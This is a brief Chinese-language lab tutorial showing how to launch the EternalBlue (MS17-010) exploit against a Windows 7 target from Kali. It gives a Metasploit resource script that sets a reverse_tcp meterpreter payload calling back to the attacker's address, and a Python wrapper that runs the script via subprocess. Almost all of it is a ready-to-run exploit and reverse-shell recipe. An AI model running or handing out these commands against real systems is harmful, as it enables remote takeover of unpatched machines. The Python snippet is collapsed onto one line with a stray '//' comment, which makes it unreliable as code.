使用python腳本去實現永恒之藍漏洞攻擊
實驗環境
攻擊工具:python+msfconsole
靶場:win7 和 kali
實驗目的
演示python腳本調用過程
實驗步驟
1.寫一個永恒之藍的攻擊腳本,定義為blue.rc
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.74.128
set lhost 192.168.74.129
run
use exploit :設置msf的攻擊載荷模塊,此處設置永恒之藍模塊
set payload :當漏洞利用成功時,此處reverse_tcp是指啟動一個反向的tcp會話。
set RHOST : 指定目標地址(受害者)
set lhost : 指定攻擊者地址
run : 運行
2.執行該腳本
msfconsole -r ./blue.rc
3.腳本執行成功,現在要通過python來執行,在python中寫入如下代碼
import subprocessif __name__ == '__main__':subprocess.Popen("msfconsole -r ./blue.rc",shell=True).wait();//等同于subprocess.call("msfconsole -r ./blue.rc",shell=True)
4.執行腳本 python blue.py